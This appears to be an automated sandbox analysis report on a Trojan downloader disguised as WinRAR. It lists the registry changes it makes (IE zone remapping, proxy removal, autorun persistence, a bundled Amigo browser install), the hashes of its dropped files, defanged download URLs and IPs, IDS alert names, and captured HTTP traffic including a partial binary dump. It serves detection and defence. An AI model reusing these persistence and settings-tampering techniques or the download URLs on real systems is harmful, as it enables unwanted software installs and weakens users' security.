"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process setup.exe:1968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Amigo]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1705.153\Installer\setup.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".webp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\Startmenu]
"StartMenuInternet" = "Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCR\.shtml\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Amigo\Commands\on-os-upgrade]
"CommandLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1705.153\Installer\setup.exe --on-os-upgrade --verbose-logging"

[HKCR\.webp\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Amigo]
"ap" = "-stage:refreshing_policy"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"tel" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Amigo\Commands\on-os-upgrade]
"AutoRunOnOSUpgrade" = "1"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"ua" = "CHANNEL_newcustom3"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}]
"(Default)" = "CommandExecuteImpl Class"

[HKCU\Software\Amigo]
"pv" = "32.0.1705.153"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Amigo]
"Name" = "Amigo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xhtml" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCR\.html\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\.htm\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\amigo.exe]
"Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".html" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Amigo]
"UninstallArguments" = " --uninstall"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"FirstInstall" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"http" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"InstallResult" = "install"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "HTML Document"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayVersion" = "32.0.1705.153"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCR\.xht\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mms" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationName" = "Amigo"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".shtml" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"VersionMajor" = "1705"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ReinstallCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --make-default-browser"

[HKCU\Software\Amigo]
"InstallerSuccessLaunchCmdLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationDescription" = "Amigo is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Amigo."

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"smsto" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Amigo\Commands\install-extension]
"CommandLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --limited-install-from-webstore=%1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"HideIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --hide-icons"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"news" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".htm" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1705.153\Installer\setup.exe --uninstall"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"IconsVisible" = "1"

[HKCU\Software\Amigo]
"InstallerError" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 4F 06 54 0D BB 9B 5A B8 66 54 0E D8 D5 00 EE"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"InstallDate" = "20140922"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Amigo"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"https" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCR\AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"URL Protocol" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"Guid" = "{34F7E448-51DB-43D6-9177-8259FBCB9839}"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"urn" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}\LocalServer32]
"ServerExecutable" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1705.153\delegate_execute.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Amigo]
"oopcrashes" = "1"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"stage" = "1"

[HKCR\.xhtml\OpenWithProgids]
"AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""

[HKCU\Software\Amigo\Commands\install-extension]
"WebAccessible" = "1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mailto" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"irc" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
"nntp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"Publisher" = "Mail.Ru"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Amigo]
"InstallerExtraCode1" = "9"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\Default User\Application Data"

[HKCU\Software\Amigo\Commands\install-extension]
"RunAsUser" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\amigo.exe]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"NoModify" = "1"

[HKCU\Software\Amigo]
"InstallerResult" = "0"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xht" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29161}\LocalServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1705.153\delegate_execute.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"DisplayName" = "Amigo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"NoRepair" = "1"
"Version" = "32.0.1705.153"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"webcal" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
"ftp" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Amigo]
"lang" = "en"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ShowIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --show-icons"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo]
"VersionMinor" = "153"

[HKCU\Software\Amigo\Commands\install-extension]
"SendsPings" = "1"

[HKLM\SOFTWARE\RegisteredApplications]
"Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = "Software\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"sms" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"amigo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --no-startup-window"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Amigo]
"ap"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"InstallResult"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Amigo]
"InstallerExtraCode1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
97b5b14d7a4c11ff41335b75e131bc2d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\r45215.exe
3ec4b74e42d9bf3b1b47550a8184cd79 c:\Documents and Settings\"%CurrentUserName%"\My Documents\CommonData\Winhlp313.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Alexander Roshal
Product Name: WinRAR
Product Version: 5.1.0
Legal Copyright: Copyright (c) Alexander Roshal 1993-2013
Legal Trademarks:
Original Filename: WinRAR.exe
Internal Name: WinRAR
File Version: 5.1.0
File Description: WinRAR archiver
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 94808 98304 4.4545 58f3e6a2fb126c91fd48320d7ed0ae4f
.rdata 102400 2570 4096 2.76326 06ae7da980d925dae92548de3499b23b
.data 106496 61464 16384 0.630486 075f064f43a17f53fd42e5f25437528c
.rsrc 172032 213240 217088 3.55993 21c023cf0f6441e5a410ae4a966916fe

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://gabport.com/amigodl.php?i=33 84.200.25.193
hxxp://horses.kupileads.ru/get_download_xml_3?stb=2&did=301653297&file_id=6299597 185.36.102.31
hxxp://moscow.cdnmail.ru/mailruhomesearch.exe
hxxp://moscow.cdnmail.ru/AmigoDistrib.exe
hxxp://gabport.com/eadkh/cibnd/bmiob 84.200.25.193
hxxp://mrb.mail.ru/update/2/version.txt?type=install&GUID={1769696B-E1A8-4585-B64F-C79F60E969BA}&rfr=profitraf3&standalone=1&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&praetorian=0&qipguard=0&comp_mem=511&tool_mem=3&bgn=1 94.100.180.127
hxxp://mrb.mail.ru/update/2/version.txt?type=install&GUID={1769696B-E1A8-4585-B64F-C79F60E969BA}&rfr=profitraf3&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5&success=1&ieovr=0&ffovr=0&br=ie&brver=6.00&bfr=0&aftr=0&bfr2=&aftr2= 94.100.180.127
hxxp://mrb.mail.ru/update/2/version.txt?type=install&GUID={1769696B-E1A8-4585-B64F-C79F60E969BA}&rfr=profitraf3&standalone=1&uacenabled=0&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5&uacpass=1 94.100.180.127
hxxp://mrb.mail.ru/update/2/version.txt?type=dse&guid={1769696B-E1A8-4585-B64F-C79F60E969BA}&sig=2977029993&br=ie&ovr=0&rfr=profitraf3&ovr_extid=&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&tool=sputnik&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5 94.100.180.127
hxxp://horses.zetecportal.ru/install?guid={1769696B-E1A8-4585-B64F-C79F60E969BA}&sig=226722307&ovr=0&browser=ie&file_id=301653297&search=1&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&tool=sputnik&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5 94.242.246.197
hxxp://mrb.mail.ru/update/2/version.txt?type=homepage&guid={1769696B-E1A8-4585-B64F-C79F60E969BA}&sig=2977029993&br=ie&ovr=0&rfr=profitraf3&ovr_extid=&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&tool=sputnik&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5 94.100.180.127
hxxp://horses.zetecportal.ru/install?guid={1769696B-E1A8-4585-B64F-C79F60E969BA}&sig=226722307&ovr=0&browser=ie&file_id=301653297&start=1&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&tool=sputnik&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5 94.242.246.197
hxxp://amigobin.cdnmail.ru/AmigoDistrib.exe 217.69.139.110
hxxp://sputnikmailru.cdnmail.ru/mailruhomesearch.exe 217.69.139.110
hxxp://metrika.yandex.ru/eadkh/cibnd/bmiob
goog3estat.in 84.200.17.150


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan/Win32.FraudPack User-Agent (Downloader MLR 1.0.0)
ET TROJAN Kazy Checkin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET TROJAN W32/Fullstuff Initial Checkin
ET TROJAN Suspicious User-Agent (FULLSTUFF)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /update/2/version.txt?type=install&GUID={1769696B-E1A8-4585-B64F-C79F60E969BA}&rfr=profitraf3&standalone=1&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&praetorian=0&qipguard=0&comp_mem=511&tool_mem=3&bgn=1 HTTP/1.1
Host: mrb.mail.ru
Accept: */*
User-Agent: FULLSTUFF
Connection: close


HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/1.2.8
Date: Mon, 22 Sep 2014 14:33:56 GMT
Content-Type: text/html
Content-Length: 212
Connection: close
<html>..<head><title>503 Service Temporarily Unavail
able</title></head>..<body bgcolor="white">..<cen
ter><h1>503 Service Temporarily Unavailable</h1></ce
nter>..<hr><center>nginx/1.2.8</center>..</bod
y>..</html>....



GET /mailruhomesearch.exe HTTP/1.1
Accept: */*
User-Agent: Downloader MLR 1.0.0
Host: sputnikmailru.cdnmail.ru


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Sep 2014 14:33:52 GMT
Content-Type: application/octet-stream
Content-Length: 2820328
Connection: keep-alive
Last-Modified: Tue, 16 Sep 2014 19:56:36 GMT
ETag: "541895f4-2b08e8"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......I.$*..Jy..Jy
..Jyb..y..Jy.s.y..Jy.s.y..Jy...y..Jy..Kyy.Jy...y..Jy.s.y..Jy.s.y..Jy.s
.y..JyRich..Jy........................PE..L....=.T....................
........i=............@..........................` ......| ...@.......
............................ .@.....!...............*.......)..R......
.....................b......`[email protected].....................
.......text............................... ..`.rdata..P...............
............@[email protected]......... ....... [email protected]..........
[email protected].........!......4!.............@[email protected]
oc........).......)[email protected]..................................
......................................................................
......................................................................
......................................................................
............................................U...M...t#.E..U.V........W
..........f.._..^]..E.]...............U..V...>.tOh0`\.....[...tNh.`
\.P....[...t>...U(j.Q.M$R.U Q.M.R.U.Q.M.R.U.Q.M.R.U.QR..^].$..~..t.
^].%..[......^].$...............U..QV...N..E..E.....P..t%.E..U.R.U.P.E
.R.U.P.E.R.U.j.PR.D....$.U..E..M.Q.M.R.U.P.E.Q.M.Rj.PQ....[..M ..t..U.
....u.....t.Q.. .[........M..F.......^..]...........U..V.u.W.}......U.
R.U.V.E..E.Pj.........RP..$.[...u>.E....t....u..E...t$..t...u.....f
.|N..t._.....^]...3.f......3._^]...........U...U.j..E.P..j.j.RP..(
<<< skipped >>>


GET /update/2/version.txt?type=homepage&guid={1769696B-E1A8-4585-B64F-C79F60E969BA}&sig=2977029993&br=ie&ovr=0&rfr=profitraf3&ovr_extid=&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&tool=sputnik&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5 HTTP/1.1
Host: mrb.mail.ru
Accept: */*
User-Agent: sputnik_statistics
Connection: close


HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/1.2.8
Date: Mon, 22 Sep 2014 14:33:59 GMT
Content-Type: text/html
Content-Length: 212
Connection: close
<html>..<head><title>503 Service Temporarily Unavail
able</title></head>..<body bgcolor="white">..<cen
ter><h1>503 Service Temporarily Unavailable</h1></ce
nter>..<hr><center>nginx/1.2.8</center>..</bod
y>..</html>....



GET /get_download_xml_3?stb=2&did=301653297&file_id=6299597 HTTP/1.1
User-Agent: Downloader MLR 1.0.0
Host: horses.kupileads.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Sep 2014 14:33:51 GMT
Content-Type: text/html
Content-Length: 2063
Connection: close
X-Powered-By: PHP/5.4.33
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 22 Sep 2014 18:33:51 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: guest_sess_id=g-426d9d546df9c768d7be7a2b304ac57d5420; expires=Tue, 23-Sep-2014 14:33:51 GMT; path=/; domain=sumsungspectr.ru
<?xml version="1.0" encoding="utf-8"?>..                        
<file>..                            <dltype>simple</dlt
ype>..                            <name><![CDATA[gravitaci
ya]]></name>..                            <url><![CD
ATA[index.php?r=site/torrent&id=466]]></url>..               
             <partner_new_url><![CDATA[hXXp://horses.zetecpor
tal.ru/install?guid=$__GUID&sig=$__SIG&hsig=$__HWSIG&file_id=301653297
]]></partner_new_url>..                            <partne
